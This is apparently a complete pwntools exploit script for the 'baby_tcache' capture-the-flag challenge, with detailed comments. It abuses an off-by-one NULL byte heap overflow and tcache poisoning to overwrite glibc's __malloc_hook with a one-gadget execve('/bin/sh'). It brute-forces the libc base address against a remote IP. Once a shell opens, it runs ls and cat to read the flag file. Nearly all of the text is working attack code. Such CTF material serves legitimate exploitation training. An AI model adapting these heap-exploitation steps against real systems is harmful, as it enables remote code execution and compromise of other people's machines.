1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
299
300
301
302
303
304
305
306
307
308
309
310
311
312
313
314
315
316
317
318
319
320
321
322
323
324
325
326
327
328
329
330
331
332
333
334
335
336
337
338
339
340
341
342
343
344
345
346
347
348
349
350
351
352
353
354
355
356
357
358
359
360
361
362
363
364
365
366
367
368
369
370
371
372
373
374
375
376
377
378
379
380
381
382
383
384
385
386
387
388
389
| #!/usr/bin/env python2
# -*- coding: utf-8 -*-
import os
from pwn import *
context(arch="amd64", os="linux")
# 12 bits of libc addresses!
def exploit():
# allocate four chunks A, X, B, C
A = fit(filler="A", length=0x608)
new_heap(A)
X = fit(filler="X", length=0x20)
new_heap(X)
B = fit(filler="B", length=0x1808)
new_heap(B)
C = fit(filler="C", length=0x4F0)
new_heap(C)
# allocate chunks T1 and T2 of size 0x20 (the why is explained later)
T1 = fit(filler="T1", length=0x20)
new_heap(T1)
T2 = fit(filler="T2", length=0x20)
new_heap(T2)
# allocate chunk T3 of size 0x20...
T3 = fit(filler="T3", length=0x20)
new_heap(T3)
# ...and free it, so that it is put in `tcache->entries[1]`
delete_heap(6)
# now `tcache->entries[1]` contains the address of T3, whose `next` pointer is set to NULL,
# i.e. `tcache->entries[1] = T3 -> NULL`
# free chunk X (of size 0x20), which is also put in `tcache->entries[1]`
delete_heap(1)
# now `tcache->entries[1] = X -> T3 -> NULL`
# free chunk B...
delete_heap(2)
# ...and promptly reallocate it (as B1), to override the least significative byte of
# the `mchunk_size` field of chunk C with \0 (off-by-one NULL byte overflow)
C_prev_size = 0x610 + 0x30 + 0x1810
B1 = fit({0x1800: C_prev_size}, filler="B1", length=0x1808)
new_heap(B1)
# chunk B1 lies exactly in between chunks X and C (as chunk B did before)
# having altered the `mchunk_size` field of C, chunk B1 is seen as not-in-use (even though it is); thus,
# the last 8 bytes of B1 (which we control) are interpreted as the `mchunk_prev_size` field of C
# here, we have set the `mchunk_prev_size` of C so that, instead of pointing to the start of
# chunk B (as it should), it points to the start of chunk A
# we now free chunk C with corrupted `mchunk_prev_size`, coalescing the whole block of heap from
# chunk A to the end of C with the top chunk
# (before freeing C, we free A so to pass the check `corrupted size vs. mchunk_prev_size`)
delete_heap(0)
delete_heap(3)
# being between chunks A and C, chunk X was also merged into the top chunk; but
# the address of X is still in `tcache->entries[1]`
# allocate chunk L (for padding)...
L = fit(filler="L", length=0x600)
new_heap(L)
# ...and allocate M, which is assigned the same address that X had!
M = fit(filler="M", length=0x1000)
new_heap(M)
# now, free M so that it goes in the unsorted bin and populates its `fd` and `bk` fields
# with addresses from libc (i.e. the address of the unsorted bin)
delete_heap(2)
# since M and X have the same address, the `next` pointer of X (coincident with the `fd` field of M)
# is also overwritten with the address of the unsorted bin
# now `tcache->entries[1] = X (== M) -> UNSORTED_BIN_ADDR -> ???`
# if we allocate two chunks of size 0x20, these will be pulled from `tcache->entries[1]`,
# and the second chunk will start exactly at `UNSORTED_BIN_ADDR`
# our end goal is to write into `__malloc_hook` the address of a one-gadget
# to do so, we need to:
# 1) make malloc returning the address of `__malloc_hook`-0x10, so to write 0x31 at `__malloc_hook`-0x10
# and create a fake chunk of size 0x20 starting at `__malloc_hook`
# 2) make malloc returning the address of `__malloc_hook`, and save the pointer
# 3) put at the top of the `tcache->entries[1]` bin the address of a one-gadget
# 4) free the `__malloc_hook` chunk, which goes into `tcache->entries[1]` and `__malloc_hook` is
# updated with the address of the one-gadget (which was at the top of `tcache->entries[1]`)
# 5) call `malloc()` to trigger the execution of `__malloc_hook()`
# we now continue the exploit proceeding with step 1)
# we reallocate M as M1, specifying a size of 0x1000 but providing only 3 bytes of data
# (the 3 least significative bytes of the address of `__malloc_hook`-0x10)
M1 = p32(__malloc_hook_addr - 0x10 & 0xFFFFFF)[:-1]
new_heap(M1, size=0x1000)
# since, once again, M1 overlaps with X, with this reallocation we changed the lowest 3 bytes of
# the `next` pointer of X (which was `UNSORTED_BIN_ADDR` and is now the address of `__malloc_hook`-0x10)
# as said a few lines above, we malloc a chunk of size 0x20 to first pull X from `tcache->entries[1]`...
Z = fit(filler="Z", length=0x20)
new_heap(Z)
# ...and then a second chunk of size 0x20 to pull our chosen address of libc...
W = "AAAABBBB" + p64(0x31)
new_heap(W, size=0x20)
# ...which we used to set the `mchunk_size` field of the (imaginary) chunk starting at `__malloc_hook`
# to 0x31 (i.e. 0x20 (chunk data) + 0x10 (chunk headers) + 0x1 (PREV_INUSE bit))
# since we artificially added an entry in `tcache->entries[1]` by modifying a `next` pointer
# from NULL to `__malloc_hook`-0x10, the two consecutive allocations of chunks Z and W (both of size 0x20)
# had the side effect of setting `tcache->counts[1]` to -1, invalidating the possibility
# of using `tcache->entries[1]` anymore
# so, before moving on, we restore `tcache->counts[1]` to a positive number by freeing chunks T1 and T2
# (i.e. putting them into `tcache->entries[1]`), allocated at the start of the exploit for this exact reason
delete_heap(4)
delete_heap(5)
# ######################################################################## #
# now, we repeat the exact same process as above to make malloc returning exactly
# the address of `__malloc_hook`, completing step 2)
A = fit(filler="A", length=0xD20)
new_heap(A)
X = fit(filler="X", length=0x20)
new_heap(X)
B = fit(filler="B", length=0x1808)
new_heap(B)
C = fit(filler="C", length=0x4F0)
new_heap(C)
# free chunk X which goes in `tcache->entries[1]`
delete_heap(5)
# free chunk B...
delete_heap(7)
# ...and promptly reallocate it (as B1), to override the least significative byte of
# the `mchunk_size` field of chunk C with \0 (off-by-one NULL byte overflow)
C_prev_size = 0xD30 + 0x30 + 0x30 + 0x30 + 0x1810
B1 = fit({0x1800: C_prev_size}, filler="B1", length=0x1808)
new_heap(B1)
# chunk B1 lies exactly in between chunks X and C (as chunk B did before)
# as explained before, free chunk A and in turn C...
delete_heap(4)
delete_heap(8)
# ...so to merge back X into the top chunk; but X is also in `tcache->entries[1]`
# allocate chunk L (for padding)...
L = fit(filler="L", length=0xD30 - 0x10 + 0x30)
new_heap(L)
# ...and allocate M, which is assigned the same address that X had!
M = fit(filler="M", length=0x1000)
new_heap(M)
# allocate any chunk after M, so that when we free M it doesn't coalesce with the top chunk
Z = fit(filler="Z", length=0x1000)
new_heap(Z)
# now, free M so that it goes in the unsorted bin and populates its `fd` and `bk` fields
# with the address of the unsorted bin
delete_heap(7)
# reallocate M as M1, specifying a size of 0x1000 but providing only 3 bytes of data
# (the 3 least significative bytes of the address of `__malloc_hook`)
M1 = p32(__malloc_hook_addr & 0xFFFFFF)[:-1]
new_heap(M1, size=0x1000)
# since M1 overlaps with X, with this reallocation we changed the lowest 3 bytes of
# the `next` pointer of X (which was `UNSORTED_BIN_ADDR` and is now the address of `__malloc_hook`)
# as explained before, we malloc a chunk of size 0x20 to first pull X from `tcache->entries[1]`...
Z = fit(filler="Z", length=0x20)
new_heap(Z)
# (free chunks we don't use anymore, since the binary allows to use
# at maximum 10 "heaps" (as it calls them) at a time)
delete_heap(0)
# ...and then a second chunk of size 0x20 to pull our chosen address of libc...
W = "\0"
new_heap(W, size=0x20)
# ...in which we write \0 (so not to trigger any involuntary calls to `__malloc_hook`)
# we now have a pointer to `__malloc_hook`
# (free chunks we don't use anymore, since the binary allows to use
# at maximum 10 "heaps" (as it calls them) at a time)
delete_heap(2)
delete_heap(4)
delete_heap(7)
delete_heap(8)
# ######################################################################## #
# now, we repeat the exact same process as above to put the address of a one-gadget
# at the top of the `tcache->entries[1]` bin, completing step 3)
A = fit(filler="A", length=0xD20)
new_heap(A)
X = fit(filler="X", length=0x20)
new_heap(X)
B = fit(filler="B", length=0x1808)
new_heap(B)
C = fit(filler="C", length=0x4F0)
new_heap(C)
# free chunk X which goes in `tcache->entries[1]`
delete_heap(4)
# free chunk B...
delete_heap(7)
# ...and promptly reallocate it (as B1), to override the least significative byte of
# the `mchunk_size` field of chunk C with \0 (off-by-one NULL byte overflow)
C_prev_size = 0xD30 + 0x30 + 0x1810
B1 = fit({0x1800: C_prev_size}, filler="B1", length=0x1808)
new_heap(B1)
# chunk B1 lies exactly in between chunks X and C (as chunk B did before)
# as explained before, free chunk A and in turn C...
delete_heap(2)
delete_heap(8)
# ...so to merge back X into the top chunk; but X is also in `tcache->entries[1]`
# allocate chunk L (for padding)...
L = fit(filler="L", length=0xD30 - 0x10)
new_heap(L)
# ...and allocate M, which is assigned the same address that X had!
M = fit(filler="M", length=0x1000)
new_heap(M)
# allocate any chunk after M, so that when we free M it doesn't coalesce with the top chunk
Z = fit(filler="Z", length=0x1000)
new_heap(Z)
# now, free M so that it goes in the unsorted bin and populates its `fd` and `bk` fields
# with the address of the unsorted bin
delete_heap(7)
# reallocate M as M1, specifying a size of 0x1000 but providing only 3 bytes of data
# (the 3 least significative bytes of the address of the one gadget)
M1 = p32(one_gadget_addr & 0xFFFFFF)[:-1]
new_heap(M1, size=0x1000)
# since M1 overlaps with X, with this reallocation we changed the lowest 3 bytes of
# the `next` pointer of X (which was `UNSORTED_BIN_ADDR` and now is the address of the one-gadget)
# (free chunks we don't use anymore, since the binary allows to use
# at maximum 10 "heaps" (as it calls them) at a time)
delete_heap(8)
# as explained before, we malloc a chunk of size 0x20 to pull X from `tcache->entries[1]`...
Z = fit(filler="Z", length=0x20)
new_heap(Z)
# ...and now `tcache->entries[1] = ONE_GADGET_ADDR -> ???`
# ######################################################################## #
# we free the `__mallok_hook` chunk, completing step 4)
delete_heap(0)
# now the address of the one-gadget is written at the address of `__malloc_hook`
# in step 5), we malloc any chunk to trigger `__malloc_hook()`...
io.sendlineafter("Your choice: ", "1")
io.sendlineafter("Size:", "123")
# ...and the shell pops!
def new_heap(data, size=None):
out = io.recvuntil("Your choice: ")
if "Invalid" in out:
# remote didn't receive data correctly, quit early
raise EOFError
io.sendline("1")
out = io.recvuntil("Size:")
if "Invalid" in out:
# remote didn't receive data correctly, quit early
raise EOFError
if not size:
io.sendline(str(len(data)))
else:
io.sendline(str(size))
out = io.recvuntil("Data:")
if "Invalid" in out:
# remote didn't receive data correctly, quit early
raise EOFError
io.send(data)
def delete_heap(index):
out = io.recvuntil("Your choice: ")
if "Invalid" in out:
# remote didn't receive data correctly, quit early
raise EOFError
io.sendline("2")
out = io.recvuntil("Index:")
if "Invalid" in out:
# remote didn't receive data correctly, quit early
raise EOFError
io.sendline(str(index))
binary = ELF("./baby_tcache") # https://github.com/integeruser/bowkin
libc = ELF("./libc.so")
# as said above, we need some bruteforcing
with context.quiet:
i = 0
while True:
i += 1
print(i)
try:
if not args["REMOTE"]:
argv = [binary.path]
envp = {"PWD": os.getcwd()}
if args["GDB"]:
io = gdb.debug(
args=argv,
env=envp,
aslr=False,
terminal=["tmux", "new-window"],
gdbscript="""
set breakpoint pending on
set follow-fork-mode parent
baseaddr
set $chunks = $baseaddr+0x202060
continue
""",
)
else:
io = process(argv=argv, env=envp)
else:
io = remote("52.68.236.186", 56746)
if args["GDB"]:
libc_address = 0x7FFFF79E4000
else:
libc_address = (
0x7F6A5C9E2000
) # one of the many possible base addresses of libc, taken from GDB
# we need to re-execute this exploit until the remote program
# uses this address as base address of libc
__malloc_hook_addr = libc_address + 0x3EBC30
# $ one_gadget libc.so.6
# . . .
# 0x10a38c execve("/bin/sh", rsp+0x70, environ)
# constraints:
# [rsp+0x70] == NULL
one_gadget_addr = libc_address + 0x10A38C
exploit()
if args["GDB"]:
io.interactive()
break # stop bruteforce
else:
out = io.recv(200, timeout=2)
if "Data:" in out:
# something went wrong
raise EOFError
# otherwise, we should have a shell
sleep(0.5)
io.sendline("ls")
sleep(0.5)
io.sendline("ls /home/")
sleep(0.5)
io.sendline("ls /home/baby_tcache/")
sleep(0.5)
io.sendline("cat /home/baby_tcache/fl4g.txt")
sleep(0.5)
io.interactive()
break # stop bruteforce
except EOFError:
io.close()
|
